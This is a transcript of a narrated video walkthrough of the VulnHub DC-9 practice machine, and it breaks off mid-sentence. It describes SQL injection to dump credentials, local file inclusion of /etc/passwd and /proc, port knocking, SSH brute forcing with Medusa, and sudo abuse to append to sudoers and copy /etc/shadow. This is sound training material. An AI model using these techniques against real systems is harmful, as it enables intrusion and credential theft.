What's going on YouTube? This is IPSEC. I'm doing VulnHub's DC-9 machine. And I had done this machine just yesterday as part of the live stream on March 28th, 2020. But the live stream was pretty chaotic because it's just hard to work and read the chat at the same time. So I wanted to do this machine justice, create a separate video for it, and hopefully one day I'll have a separate video for all the machines on TJ Knoll's OSCP-like machines to practice on and learn from. So with all that being said, let's just jump in. We have the VM set up, and both the VM and our host is on a host-only adapter on the network. So both things are going to be on a 192.168.48 subnet. So just going over to show you, our machine that is running Kali does have the second network adapted as host only. If I do ifconfig eth1, that is the IP address of my Kali machine. And if I do an arp-scan --interface eth1 and then 192.168.48.0/24, we're going to scan the subnet for other boxes, and we see the VulnHub machine is at 192.168.48.130. So I'm going to make the directory nmap and do nmap-sc-sv. That's going to be for default scripts and enumerate versions. OA output all formats, put in the nmap directory, call it DC9, and then the IP address, which is 192.168.48.130. And let that run. I'm going to then put a sleep for 5 minutes because I hate running multiple nmaps at the same time, and looks like I don't have to do that. But we can do a --p- to do all ports, and then -oa DC9 192.168.48.130. And when we look at this, we see two things. The first thing is port 22 is filtered, so there's probably some type of unique config going on there, because it didn't say any other port is filtered except 22. If you wanted to dig into this, we could open up Wireshark and see exactly what happens there. We also have Apache. It's just open, and the box is running Debian, and we have the http-title saying example.com. So let's go over to Wireshark, capture on eth1, and we want to do port 22. So I'm just going to search for port 22. TCP.port is equal to 22. And I'm going to do netcat 192.168.48.130 on port 22 to initiate a connection. And what? It's open. It is open. So it looks like our nmap actually opened up port 22. That is weird. So we're going to ignore this for a little bit. Actually, I'm going to pause and restart the machine to reset what happened. Essentially, there's a port knocking service on this that we'll find out in a little bit. And if you enter the ports in a specific order, it opens it up. I'm guessing when we did our nmap scan, it hit all those ports within, I think, the 25 seconds needed, and it opened up that port. But that's going to ruin what we're trying to do. So I'm just going to reboot the box. So the box is averted now. If I do an NC on this, we get connection refused. And that is what we actually wanted. As odd as it sounds, that's how it should be. So I guess if you just nmap this box twice, port 22 will open, and we'll test that. And oh, it's when we did our np-p- is when it opened. So let's filter on port 22 and do a netcat. And we can see we reach out to it, sending it a SYN packet, and then it sends us a port unreachable. So if we try port 20, something that's not listening, and do a filter to show that, we get a reset. So we send it a SYN, it sends us a reset acknowledgement saying the port is closed. And that happens on any port that is here. So accept 22. So that means that IP tables is probably on this box and configured to reject packets. And when it rejects it, it sends it this ICMP. So if you wanted to be sneaky, always make sure that your reject rules in your firewall are the same exact thing as what happens when it doesn't hit a reject rule. So let's move on and actually test out a theory of that dash p dash causing this. So if we do this, nothing happens. So let's do nmap dash p dash, wait about 30 seconds or already 192.168.48.130. I'm not sure why it said the host was up, down. 192.168.48.130. If config eth1, I lost my IP address. DH client eth1. Okay. There we go. Let's do this nmap, and we don't need to do an output file. Looking at this, connection refused. Let this run, and when this finishes, it'll probably be up. So still refused. It's about 16% done, I guess. Oh, nmap, maybe not dash p dash. Let's just do nmap. I really have no idea why that opened up earlier. I guess we just got lucky and nmap scanned it in an order that was compatible with opening it up. So, can't replicate that. Not sure what happened. That's why I had reverted the box. So, let's move on. It only had port 22 as filtered and 80 as open. So, let's look at port 80. So, 192.168.48.130. And we get this website that looks to be not well created. Let's see. We got a few links. So I'm going to open up each link and we'll go through them. So display.php has all this. Search looks like we can search with either first or last name. So if we go here, grab a name such as Tom, search, it pulls the result. And then we got a login page. So we can try logging in with admin, and we get password invalid. So what I'm going to do here is start a GoBuster. So gobuster-u, http, 192.168.48.130-w for word list, user share word list, durbuster, directory list, 2.3, medium. And then we're going to do dash x to do extensions. So it's going to take everything in this file and put the extension php after it. And I'm doing that because looking at the site, we know it does php. So dash o gobuster dash root dot out, and I had to specify the mode for gobuster. You got dir, dns, and vhost, or yeah, I think those are the modes. So do this, and while this goes, we can take a look at the pages. So there's no input in this display, so we can ignore this for now. This staff did have something. So let's send this over to Burp Suite and play with the request. And I don't have Burp up. I'm just going to run it. And while we wait for it to start, let's just manually poke at it. So I'm going to do a single quote and see what happens. We do submit. Well, we have to tell it not to go through Burp. And then Control Shift R to refresh. We get zero results. So I was hoping to get some type of like SQL error. And same thing goes for that. If we go next, start Burp. do a comment after this and click submit, we get the data. So we have a classic SQL injection. If we go up in Cherry Tree, we can explain what is happening. So where's Cherry Tree? We can just call this DC-9. And the syntax is probably going to be something like this. Select, let's see. We'll do name, or select star, because a valid return returns everything. But it's probably ID, name, position, phone, email. But we'll do this for now. From the table name. So this is probably going to be, let's call this users. And we'll do where first name is equal to user input. So it's probably like this. And what we did was we put a single quote here, and now this syntax is failed. And then what we did was we put a comma, a comment. So the single quote the server has is no longer valid. So anything after that is gone. So this is now a valid SQL query again, and that's why we got the result returned. So now we can do something called a union injection. And I wonder if we can explain this quickly. Let's do SQL query structure. Let's see. I gotta figure out why my VM keeps doing this, or just set myself on a static IP. But I keep losing my IP address. Let's see. Select statement. Example, it doesn't have it. Check these two real quick. So this gets some. It doesn't do a good job on getting them all because we don't have things like out, file, union, etc. So let's see. Let's just help it out by saying union order by out file, just things we want. And we got a document for union. That's not what we want. Reference material for select. There we go. This is kind of what I wanted. So since we're injecting in the where condition, most likely we can do everything after this, like group by, ascending, descending, having, order by, limit, procedure, into out file, into dump file, for update. And it's not really going into a union. Let's see, select can include union statements in subqueries, but when you have an injection and you're here, you know you can do everything below. That's, I guess, what I was trying to do. So let's go over and do a union injection. And what a union injection, it's a subquery that will allow us to inject what we want to select. And in order for a union to work, you have to know everything that is right here. And my VM is going incredibly slow. I'm going to pause the video because if you can hear, I'm clicking and nothing is happening. Okay, so things appear to calm down. So where was I? We're talking about union. For union to work, you have to know every parameter here. So looking at what it returns, we got ID, name, position, phone number, and email. So ID, name, position, phone, and email. So we know we have this much data. And the reason why we need to know this is, again, because we need to know how many parameters are in the union. So there's two ways to go about doing this. The first is we can just do union, a bunch of unions, and eventually it'll work. So let's go burp suite on. That's the display. That's the wrong one. Let's go results, control shift R. Resend. Drop. So here's our SQL query. So we can do union select one, and we get zero matches, 1, 2, 0, 3, 0. Well, I'm looking right here actually at the bytes, 1, 2, 4, 8 bytes. So when that number changes, I know I made a big difference. And at 6, we get 1, 4, 2, 3 bytes. So it's no longer 1200. And looking at this code, let's see. Come on, render the page. We can see ID 1, name, position, phone number, and email. So the reason why it was 6 and not 5 is name is broken up into two things. We got probably first name and last name. The other way to really go about identifying how many things are on that left side is using the order by statement. So if we do order by 1, we're going to get 1,347 bytes because it's a valid SQL query. When we were doing union, nothing was returning. It was saying zero results. So order by 2, still 1,300 bytes. 3, 4, 5, 6. And then on the 7th request, we go from 1,300 bytes to 1,200 bytes because it can't order by that 7th parameter. So what we're doing is saying order by 1. And SQL is smart enough to know 1 means ID. And we can say first and last name now that we know that. You could also specify the column name in the order by statement, or order by 2 would be first name. So it's smart to know that. And when you go to 7, it goes here and is like, hey man, there's no 7th result. So that's why the query fails. So two ways to know how many things to do a union with. So we can go back and do union 1, 2, 3, 4, 5, 6. Union select. And what we want, we could do something like DB, I think. No. If we go SQL injection cheat sheet, there's a few parameters we could choose. I lost my IP again. I really should have fixed this between last night and now. But SQL injection cheat sheet. I like the pen test monkey ones. You got a bunch of things you can do. Database, not DB. So if we do database, we can see, let's see, we're in the staff database. If we want to list all the databases and information out of the SQL database, we can do that with a, I guess, just SQL statement. So let's go and look at information schema. And this is going to be like the central database for MySQL. It's how everything is grouped. So everything here is tables. The key tables are going to be columns. Where's tables? Schemata. Schemata is going to be all the database names and tables. Those are the three key ones. So let's go and grab all these. And we want schema name. This is going to be the database. So we can do select schema underscore name. And then on this right side, after all the numbers, we can do from information schema dot schemata. And click send. And ID, we get staff. We could change the limit statement. So limit 1, 0. This is going to, I think, start at 0, display 1 result. And we get invalid query. Maybe it's the other way. I always screw up the limit statements. Let's see, ID. Name, Tomcat. So that didn't get anything. Let's try 1, 1. We got information schema. So it doesn't start at 0. So 2, we get staff. And 3, what do we get? Nothing. So the other thing we could do, instead of doing a limit statement, we can do a group underscore concat. And this will put things on the same line. Because the reason why we can't select multiple things is because PHP is only pulling one item out of that result. It's probably going to pull the last one. So group concat is going to put them all on the same line. So now when we do this, we have information schema, staff, and users. So there is definitely 3. So going here, let's go and create a new node, SQL structure. So we know there's a information schema, and this is going to be simple. It's just going to be, let's do schemata, columns, and tables. Those are the ones we care about for information schema. So let's go down to staff and users. So let's see what columns are in staff. So what we can do is change this to be whatever the columns thing is. So this is the tables or table. We want tables, not columns yet. So table name. And then table schema, this is going to be the database name. So let's go back here, do table name. And this table is going to be .tables. Click send. And we get a lot of results. This is for everything. So what we could do is put where, and we can put schema name is equal to staff. Click go, and that is wrong. Table underscore schema. So let's change that to be table underscore schema is equal to staff. And now we have two tables, staff details and users. So we can go back here and put these two tables. And staff details, we can get rid of this information schema thing. We don't need that anymore. But we want to know what columns are in each of these tables. So to do that, I'm going to rename this one to be table info, press Control R to go to a new tab, and we'll put column info. And the reason why I save that is because we're going to redo this for the users table, and this will just be easier. So going back to the information schema page, columns, I guess we should have table schema, table name, and column name. So we can change this to be column name. From information schema tables where table schema is equal to staff. We want this to be columns. Click send. And we have ID, first name, last name, position, phone, email, reg, user ID, username, password. we probably want to know which column each of these goes to. We could do an and statement. So we could do and column name is equal to users and see what this returns. Maybe it's lowercase. Let's see, we're table name, not column name. I keep getting column and table confused for some reason right now. Table name is equal to users. And we get user ID, username, password. We could also go up here in this group concat statement and do table name, comma, colon, comma. And now, when we display this, we get staff details ID, staff details first name. So we get everything we want. Since how I'm organizing this in my cherry tree, I'm going to do it this way. And we want to get rid of this. There we go. Just want user ID, username, password. So user ID. Actually, let's just do them all. This is table name, comma, like this. This would be the quicker way to document. And we don't need this. Copy. Copy there. Paste. And we'll go where there's a comma. Let's just go into bash real quick. Echo dash n. Sed. Search for commas. Replace with line breaks. And we'll paste. There we go. So now we have a list of all the fields. And we can do the same exact thing for users. So we'll just change staff to be users. Click send. Is it lowercase? Group concat, table name, column name. Or maybe not plural. Lowercase. So do the same thing. Echo dash n. Sed s comma. And like that. And we have everything. So users only had this information. ID, first name, last name, username, password, and reg date, which is probably registration date. The first thing that is immediately apparent to me is this user's passwords. So let's extract this. So we can just do username and password. So replace table name with username. And then this one with password. And now we no longer want information schema.columns. We want that to be staff. And we don't need a where statement. Click send. We get nothing. Staff.users. Let's see. We get one. Admin in this hash. So I'm going to create a new thing called creds. and we'll paste that. And I wanted to say there was, oh, users has username and password. So we can grab this as well. So if we do group concat, username, password from user details dot username. No, user details. We want users dot user details. This was lowercase. Okay. So now we have a bunch of credentials. So echo dash n. Said S, comma, N, like that. So go to creds, paste this in. We have a MD5 hash. So what I'm going to do is copy this, and we're going to search the internet to try to crack it. So let's go to hashes.org. Again, DH client ETH 0. There we go. That's going to get annoying real fast. We can do search, paste the MD5 hash here. And I know it's MD5 because this is 32 characters. Echo dash N, WC dash C. Oh, I didn't copy the whole thing. Let's go back to Burp Suite. And what was it? SQL structure. User's password out of staff. So from staff.users. Username, password. We can just do password. Or this return. Copy this whole thing. I forgot the C at the end. I'm glad I went to explain that. So add the C. That's now 32 characters. And we have this almost impossible to read captcha. Q, T, K, H, C, K, K. Did not find it. And then you can also go to other sites. Hashkiller is a good one. Maybe .co.uk is the one I'm looking for. Hashcracker MD5. Paste it here. Do the much more reasonable captcha. And we get the password as transorbital1. So transorbital1. So we have a bunch of username and passwords, and now we have to try them all. So if we go to manage, we got username and password. So we can try going to proxy clear queue, username test, password test, submit. We got to put it on intercept mode because I want to see what the login prompt looks like. I'm looking for like a cross-site request forgery token or something, and we don't have any. So what we can probably do is do wfuzz on this. So let's go back to cherry tree. Copy these to a file, vcreds, paste this all, and then do awk-f:print1 creds. This will be users print two. We'll call this passwords. So wfuzz dash h chains. Let's display help on chains. Chain. No. Let's just try wfuzz dash w users dash w passwords dash u http 192.168.40.130/manage 192.168.48.130 manage.php. And then we want dash D for post data. And the post data is going to be username and password. So username is equal to fuzz and password is equal to fuzz. So let's see what this does when we just specify W twice. Fuzz and number of payloads don't match. So I think if we do maybe dash M zip, will this work? Does not. Let's see. WFuzz multiple parameters. Advanced usage. So dash Z list. ABC 123 fuzz fuzz. So I wonder if we have to use dash Z when we do multiple parameters. So zip, we'll do A1 C3 B2 because it's going by the first thing. If we don't specify any chain, it does all combinations. If we do dash M chain, it's only going to do one parameter. So hopefully that makes sense. So we want the dash M zip, but we also want to specify file. So let's see. WFuzz dash Z, probably the basic usage, dash W word list. File, and then the file name. So let's try this. Dash Z file users, dash Z file passwords. Let's see, where's my syntax? I'm just going to put the URL at the very end and not do that dash U. And I don't know why I'm getting so much clipping on my VM right now. We're still getting an issue. Put this in single quotes. Let's just test something out. Question mark, fuzz, and fuzz. Oh, I have X. So that looks better. So let's go back to where it was dash D, change that dash X to a dash Z. Fuzz, words, and payloads don't match. It should. Let's see. Uh, I'm just going to try their example. 192.168.48.130. Okay. So file, passwords, file, users. That worked. FUZZ2Z is what I missed. Oh man, that is obnoxious syntax. FUZ2Z. Mainly because the 2 blends in with the Z. There we go. So, doing that, we see the password is admin and transorbital 1. Wow. I can't believe I had missed that. Or I can't believe someone thought that was awesome syntax to use. So submit. Let's go to manage. Try it again. Whoops. It's not in my clipboard correctly. Copy. Paste. Logged in as admin. And we get this weird thing that says file does not exist. There is also add record, so we can insert something, it looks like. So if we insert, please subscribe, position as CEO, phone number as 555s, and the email will do thanks at for subscribing dot awesome. Click submit, and now we do all records. We have something. I don't know what that really buys us, but we can insert things into the database. Could be potential rabbit hole for people to try, like A, B, C, D. We may want digits. And position, like for people to try PHP code. So we can do this and see if this works. But normally when PHP grabs data out of the database, it does not work. So if we view the source, go to the end, do we have PHP info? We do. So it printed the PHP tag. So maybe that's why that's there. But if we go back to manage, we see this file does not exist. So that's probably hinting at something. So I'm going to search the source for file, and we don't see anything. So chances are we probably have to fuzz manage.php for some type of parameter. So I'm going to go back to wfuzz. And before we do that, let's go find slash user share seclist grep-i, and let's search for burp. And we have a few things. So the one I want is burp parameter names. So let's go back to a wfuzz and remove this syntax. And what we want is just dash w and paste that. And then question mark will do fuzz is equal to what could be a potential file here? Probably index.php. Let's make sure that exists. index.php. It does. So search for that. And now we want to hide probably everything that is 87 words. So we can do dash dash hide words 87 and see if anything comes back. And burp parameter names is just a bunch of things that may be parameter names. Nothing came back for index.php. We can try the good old standard LFI, which is a bunch of dot dot slashes, and then etsy passwd. And see if anything comes here. Nothing. So let's see. We may have to specify a cookie, actually. We probably do. So going back to this, if we do a dash p for proxy and do 127.0.0.1, port 8080, and then HTTP in all caps, we're going to send what we're doing through Burp Suite. And if we just go to this page, we probably won't get anything because we don't have our PHP session ID. So let's right click. Or actually we can send to repeater, go and render page and see what this page looks like. Do we even have that error? We don't have that error at the bottom. So that would probably explain what's going on. So let's control C out of that. We can grab our PHP session ID. So let's send this through Burp. Go to manage. See what it's trying to do. And this is the cookie we need. So wfuzz-h-b is for cookie. So we can do, I'll actually leave the proxy up. So wfuzz-p. So you can see what's happening. And then dash b for cookie. Paste it. Clear the queue of intercept. Refresh. And now we're getting this PHP session cookie. So if we click repeater, go and go to render, render page, we now see file does not exist. So let's clear this and do wfuzz. We can just get rid of the proxy. When you pipe wfuzz or GoBuster or something through Burp, it slows it down. And also, Burp is a Java program. We'll have a lot of memory assigned to it afterwards because it keeps all that information in storage and just slows down your machine. So don't send things through Burp that you don't have to, especially with like wfuzz, GoBuster, etc. So let's try this. And now we should filter for 100 words. And it looks like we're not getting anything. So let's try a good old trusty dot dot slashes. Etsy passwd. And right away, the file parameter is 3,694. So if we go back to a repeater and say file is equal to bunches of slashes, click send, let's go to the raw, we get the output of passwd. So I'm not sure why index didn't work. index.php, because this should include itself. Let's try manage.php. Maybe it has some check that prevents it. Nope, file does not exist. So let's do after video go over LFI and manage.php. Okay. So let's see. With this LFI, we can include various things. The first step is try to go to log. So var log apache 2 access.log to see if we can read this file. If we can, then we can do like log file poisoning and put our PHP code inside a user agent or something and get it executed. But I'm not seeing anything. And we don't have our PHP session. So let's send this. Intercept on, repeat, and copy. I closed that repeater tab when I didn't want to. Okay. So file does not exist. And I'm going to put this here in my search term. So if I ever see one match, I know didn't work. So the other thing is the try to get code out of it. So if we try to include PHP files, well, it didn't work. So let's try the bunches of slashes, var www html index.php. And that's looking better, actually. Because we're including index.php, it's probably looping over this and never going to finish, because maybe manage.php calls index.php and then that's where the file parameter is. But it's probably going to say, hey, go display this page. Oh, this page displays... It's probably something like this. Manage.php calls index.php, which has the file parameter of grab index, or yeah, grab index.php. And we're going through an infinite loop here because it's just going to grab index.php, which then has the file parameter this, to go grab index.php again, and just goes on and on and on until the process runs out of memory. So that's looking good. As weird as that sounds, it not coming back is a good thing. So let's see. What is something that may not grab? We can do display.php. See what happens when we include this. Still just hangs. Okay. Let's see. We can do PHP filter convert dot. Actually, PHP filter is probably not going to work. And I say that because for PHP filter to work, generally, you should be in the directory dhclient eth1. Did I lose connection? Why is nothing coming back? Oh, I'm still there. Let's get rid of this. Ping 192.168.48.130. I can ping it. Curl 192.168.48.130. That's coming back. That's going where I think it is. That's coming. If I put this cookie. Everything I do with the session now doesn't work. When the session is here, the page just doesn't return. Let's log out and log in. Maybe the database hung or something. Let's try logging out by deleting our cookies. Manage username admin transorbital 1 for the password. We're now logged in. We go to manage. That's looking better. I don't know what we did to that PHP session. Let's see, do I have it saved? I do. So put this PHP session in. File does not exist. Okay. File is equal to index.php, and we get it doesn't exist. So chances are we're in some type of directory. So it's probably doing a include and then some directory slash user input here. So think about it this way. If it did this, we can't put the PHP filter here because it's got a directory before it. If it didn't, then it starts with this, which then causes it to go down that path. So that's why I don't think that will work. So if we do dot dot slash index.php, it doesn't hang. So we're in one weird directory. But we can try php filter convert.base64-encode resource is equal to index.php. Click send, and we get file does not exist. So that doesn't work. The proc table, so cd/proc, has a bunch of useful information. All this are the process IDs running on your box, and then inside that is secret information about the process. So if I do ps-ef grep bash, let's go into 8687. And here's all the information about the bash process. So this is how tools like PS get all their information. So if we do like cmd line, it's just going to be bash because that is this piece right here. If we do, let's see, lscwd, it's going to be the working directory of that process. So that was root VulnHub DC-9. So bunch of cool information out of this. There's also the FD for file descriptors, and that may just contain random stuff about the process. And when you do LFIs, you don't know exactly what PID you are, but there is a magical directory called self, which is always going to be yourself. So if I do a LFI on proc self and cmd line, click send, we get file does not exist. What? Manage file etsy passwd. Let's make sure this works. Okay. Oh, file does not exist, and then it displays it. That is annoying. So file does not exist, but we get the cmd line of user sbin apache 2-k start. So we can try fd 0 and we get nothing. Fd 1, nothing. So let's go and copy this and wfuzz it. So we'll do wfuzz-z range 0 to 100. Let's try 100 file descriptors dash u. Put the URL, which is going to be http 192.168.48.130. And then the number is what we want to fuzz. And we can do dash dash hw 87. And probably need to put our cookie, dash b, and let's grab PHP session ID. And let's hide 100. And we get nothing. So that clearly did not work. So another thing in the proc table, cd/proc, is this schedule_debug. If I cat that on my Kali machine, we do less, you can see lots of things that may be process names and just good details about the box. So this is another good thing to look at. So let's go proc sched debug. Grab this and let's just throw this into a file because there is a lot to go through. Oh, we can go in cherry tree. Okay. So what I'm going to do is we're going to go through all of these. And there's probably going to be a lot of duplicates. So let's just V output paste. And we can cat this, pipe it to awk print to. And then sort dash u for unique. Because we don't really want to go through duplicate things. All that IAQ stuff, not important. Let's see, going through audit stuff, block, just looking through. And one sticks out, NockD. NockD is a port knocking service. And if you remember going back all the way to the beginning, there was port 22 as filtered. So we can go through the rest of these things and don't really see anything. There's the SSH daemon. But let's go back to Burp Suite and try etsy nockd.conf. Is this a file? It is. And if you didn't know where NockD is, you could just Google NockD configuration location. And we see to open SSH, we send these ports. To close SSH, we send the ports in reverse. So I'm guessing with nmap, it all depended on what order it sends the first port in. So if nmap sends 7469 before 9842, it'll probably open up SSH. If it sends 9842 before, it probably closes it again. So that's probably what happened there when we were doing this box, is by chance nmap sent this port first, because nmap scans ports in a random order by default. We could nmap no random port. That is super annoying. DH client keep zero. I'm really confused what adding a second interface did to muck with my ETH zero. Scan order, port, exclude, fast, dash R is don't randomize. So if we do an NC 192.168.138.130 on port 22, is it 48? It's closed. So nmap dash b dash dash r 192.168.48.130. Looking at this NockD config, the ports do go in consecutive order. So as long as it does ports one through whatever, it should be open at this. So let's see. So it says 22 is filtered, and now 22 is open, because it hit all those ports in the correct order. So I guess just randomly, if your nmap does the random in this port order, it's going to work. And I don't mean it has to do these three consecutively. I just mean when it scans 7469, then it's got to scan 8475 before 9842. So that is interesting. Let's go ahead and close it. So those are the ports. So we can do NC192.168.48.130, 9842, 8475, and 7469. And now if we go on port 22, connection of fused. If we reverse that order, so 7469, 8475, 9842, it's now open again. So let's try doing Hydra against this. So Hydra dash H, it wants dash L for user file. So dash L users dash P for password file. That's going to be passwords. And then we want SSH 192.168.48.130. And then reverse mode. So we'll do dash V. And Hydra's not connecting. Not exactly sure why my Hydra screwed up. It was this way when I did the video box live as well. So we defaulted back to ncrack. So ncrack, let's see, so an SSH example. So dash P SSH and dash capital U and dash capital P. U users P passwords, and it's doing HTTPS here, so I'm just going to specify SSH 192.168.48.130. Is there a thread option? Let's see, wait time per login over all the threads. Let's see. Tasks in parallel. So let's do dash T 32 and dash capital T 128, I guess. We're just doubling it. And was there a verbose? There was. We can do dash V for verbose. And see what this outputs. So it's going to be 2 minutes left. I'm just going to pause the video and we'll resume when this is done. So it's been a long time, probably like 15, 20 minutes, and this ncrack still isn't finished. So I'm going to kill it, and I'm guessing it's probably because of these threads. SSH normally doesn't like being threaded. And I'm also going to now try a different option I saw when I was looking over the man pages called pairwise. Choose username and password in pairs. So what this is going to do, hopefully, is going to try the username and passwords in pairs. So maybe admin and only transorbital one it'll try, because our password list is in order. Actually, if we do head users and head passwords from the SQL database, this should be good. So Mary M is probably 3KF and Chandler is you're a god. So if we head cred, Mary 3KF, Chandler, you're a god. So hopefully it works that way, but it didn't do anything. So we're going to give up with ncrack and switch over to Medusa. So dash H for target or IP address. So 192.168.48.130. Dash capital U for username file, users. Dash C for combo entries. that may be what we want. Medusa dash C, H192.168.48.130-C. Let's just give it creds. And dash M for module SSH. Invalid combo file format. Man, Medusa combo. Let's see. The file contained combo entries. Combo files are colon separated. Host user password. Okay. So cat creds. So all we need to do is add the host to this. So let's do for I in creds. Do echo 192.168.48.130:I. Done. This will be combo. So go back to Medusa. And we can do combo. And I'm guessing we don't need the IP address since the target is in this word list. And let's try this. Admin transorbital 1, Mary. Yep, it is doing it as we expect. If we wanted to speed it up, we could probably do threads. So let's do dash T. We'll do 6 and see if this is anything. It should display errors as it finds it. But there we go. We're now finally getting success. So maybe from now on, I'm always going to use Medusa for checking SSH because this syntax was pretty easy to use and it's relatively awesome. So we got Chandler, you're a god, Joey and password, and janitor. So let's go here and say SSH and we'll copy these lines. So let's do Chandler and you're a god, Chandler B. So SSH. Chandler B at 192.168.48.130. Paste the password and we get into the box. So I can do find dot to see if there's any files. There is some weird GNU PG things, but I'm going to disregard that for now. We could run lineage linps, which is my preferred privilege escalation script. So if we do make dir www ls opt, it's going to be this privilege escalation awesome script suite. And almost everything in this opt directory can be found on GitHub. So if you just Google these things, you can find it. So let's go in www and cp opt this, and then linps, linps.sh, and we can start a web server, http.server on 80, Python 3. Go back to our shell. Do we have curl? We don't. We do have wget, so we can just wget 192.168.130/linps.sh. Not found. L-I-N-P-E-A-S. I probably typoed that then. Oh, we're 129. The box itself is 130. So we can execute linps and let this run. And I'm just going to SSH again while that runs. Maybe if I can get this before. SSH Chandler B at 192.168.48.129.130. You're a god. So we got 2 sessions. So let's just go to the very top and go through this. Red and yellow are things we definitely should look at. If you see this, chances are you can privesc. So let's see. It's telling us basic information. Ping is available, so we can do network discovery, but netcat is not there, so we can't do port scanning. Operating system is going to be Debian. There's the path, system, environment. Useful software, we have wget, socat. So we don't have netcat, but socat can probably do tunneling stuff. Python, Perl, PHP, and sudo. We also have GCC. So if we wanted to go with a kernel exploit, we could compile it on this box, which is super handy. Otherwise, we should stand up a Debian 10 box to compile there to make it as similar to a target as possible. However, since this is VulnHub and an old machine, I'm going to ignore doing all kernel exploits. Unless I run into a huge wall, I guess I should say. So looking at this, it highlights NOCD. We already know that. Nothing else really interesting running on a root process. We do have MySQL, which we should enumerate. And we can probably get more credentials out of the PHP scripts. So going through this, users with console highlighting Chandler B, because that's who we are, and then root. Users on the box, last logins, password policy. Not really seeing too much. It's printing out the port knocking sequence for us. The set UID binaries. All these are standard. I don't see anything really sticking out to me. Set user group binaries or GID, same exact thing, nothing really sticking out. And let's see, var lib php sessions. We could look at all the session information. This is going into var www. We got some backup files. It's highlighting probably username here. We got my password, so we should find out what my password is. And that is it. So let's go var www.html and figure out where the password's going to be. Typically in PHP scripts, you see things like db.php or config.php. Those are the ones you generally want. So MySQL server's on localhost, the username's dbuser, the password is password, and the database name is going to be staff. There's probably a database name called users as well. So let's go MySQL dash u db user and dash p, type in password, and we get authenticated. So we could also do show databases, and we're here. We can use staff, show tables, and we can select star from staff details. And look through this. So we can see the one we created. We can see when the box was probably created, 2019-05-01, because everything's here. Except we have the Janitor account and Janitor 2 account being on different days. So based upon this being different and the Janitor here, I'm going to switch to that user. So su-janitor. We could also start up a whole new SSH session if we wanted to. Copy the password, paste it in, and if we do find dot to see anything in this home directory, we can see secrets for Putin. We can go in there and cat passwords found on post-it notes. And we have a few more passwords. So what we can do is go back into where Medusa is. So let's go and V, we'll just call this one PW. And then Medusa-H192.168.48.130-U users-P. PW, and then dash T, we'll do six threads again. We gotta do dash M for module name, SSH. And let's see. Oh, probably wants capitals. I'm used to crackmap exec, which automatically checks for you if it's a file on all arguments. So I'm trying to log in now. The reason why I didn't just add these to our existing password list is because, well, we already tried the valid credentials there, and also that's like 18 lines, so you'll have a lot more things. Instead of doing 6 attempts per user, we'd be doing 24 attempts per user. And we have a few ones. We have Fred F, Joey T. So we can try Fred F. So we can copy this line, go here, paste that, and then we can do Joey T, paste that. And I think that is it. So we got two more users. So let's check Fred F. So this is Chandler, that is Janitor, and we'll do another one for Fred F. So SSH Fred F at 192.168.48.130 and find dot, and we don't really have anything here. So let's copy Lynn P's to a place we could all read, and like Chandler can't go into any directories. So we can look at what groups everyone's a member of. We don't have anything. And there was another user, Joey T, with a password of password. So SSH Joey T at 192.168.48.130. Paste this. So actually, I'm not going to run Lynn P's on them all. We're just going to do find slash dash readable dash U Joey T period. Let's see. Bash find readable by user. Get my internet for a few minutes. How find files based upon permissions. Find files not. I guess I can just do find at dot dash readable. Yeah, that'll work. So to dev null, and we can pipe this to dev shm Joey T, and we can do the same exact thing on this user, except Fred F, same thing here, Janitor, and same thing here, but for Chandler. So if we go into dev shm, oh shoot, I did not copy them to a directory, I forgot a caret. Here we go. So now we have all the files. So let's try something. Cat star, sweet. So we can probably do unique-c for count on star. Cat star, pipe it to unique dash C, sort dash N for number. And we can pipe to uniques. So what I'm doing here is I want to see how many unique things there are, and why is it one? I was hoping that would work. Doesn't look like it would. Oh shoot. We can just cat uniques grep 2 4 Chandler. Let's see. Cat star to all. cat all unique dash C two uniques. I'm not exactly sure why unique dash C is not working. Let's grab macd on uniques on all. Yeah, this appears multiple times. Unique dash C works there. Okay, we're going to ignore that. And we're just going to I don't want to ignore it. Chandler, Fred, Joey. So RM all uniques, cat star all, grep mech on all, unique dash C. Okay. Cat star unique dash C. Oh, I'm an idiot. So unique is only going to work if the numbers are right next to each other, or not numbers, the files. So in mech, unique's working here because they're all here. However, if v explain, there's something in between this, and now we do a unique dash c, it says one, breaks it up, three. So we have to sort all to sorted. And once we do this, now we can do the unique. So cat sorted unique dash C to uniques. And we can probably disregard everything that is four. So cat uniques grep dash V four. And we probably don't want slash run or, let's see, I think we can do or that way, slash proc. And we can see all the unique files on this box. So dev, we don't really care about because this is where we put our stuff. But we got Chandler's bash history, Fred F, janitor Joey. So the reason why I was doing this is because if we ran linps on each user, we'd have a ton of information to go through, tons. However, doing this just shows us what files are unique based upon the user, and we don't have anything. So we could do the same exact process, except instead of readable, do writable and see if any user can write files, but I'm not too concerned with that, since I don't see anything here. So the next step is to do sudo checks. So sudo dash L, and we need the password for Chandler. So if we cat creds grep chand, you're a god exclamation point, Chandler may not be able to run sudo. Joey, sudo dash L, his password was over here. Joey can't run sudo. Sudo dash L, the janitor, the password, can't run. Sudo on Fred, he can run sudo right away. Doesn't even need a password. So he can run opt dev stuff dist test test. So if we less this file, it is just an ELF, which is a Linux executable. So let's go in this directory and see what this is. Go up two directories and this test.py. So if we just execute this, it says usage python test.py read append. So if we look at test.py and examine what it's doing, We have usage, Python test.py, read append. And this is argv1, argv2. So it's going to open sysargv1 for read and assign the contents of that file in output. And now it's going to open sysargv2 and append and then write that output and then close. So we could go probably two ways to get on this box. Or there's a lot of ways we probably can, because we can just write a file. You can do a lot of badness. Cat etsy sudoers, we can't read that. But we could just put a line in sudoers to allow us to sudo to anything. So let's do that real quick. So let's just create a new pane. Cat etsy sudoers, do we have this file? Let's see. Members of sudo, right here. User privilege escalation. Let's just add this. So if we go back to this, and let's do vi/temp, sudo add, paste this, and what user do we want? Let's do Joey T. So remember, Joey T can't run sudo, and it's asking for a password. And now let's run sudo dash L. So sudo this slash temp slash sudo add slash etsy sudoers. Oh no, we're gonna add. Wrong order. The file we want and then the file we want to append to. Temp sudo add. Okay. We could also, I guess, read files. So Joey, still asking for a password. Weird. Was that it? So that doesn't look like it worked. But we could copy that sudoers file. So if we do temp, let's touch temp test, and then run the same sudo command and copy. Wait, did I have it backwards? Cd op dev stuff test.py read sudo. And so, yeah, I had it right the very first time I ran it. So if we look at sudo add now, we copied the sudo file in here. So this sudo command is data you want to copy and then add it to this file. So if we did etsy shadow on temp slash test and look at temp test, we now have the entire shadow file that we could try to crack with Hashcat. If it wasn't SHA-512 encrypted, because this is super slow to crack, I'd probably throw this into Hashcat, but not going to be too worthwhile. So let's reverse that sudo thing and do temp 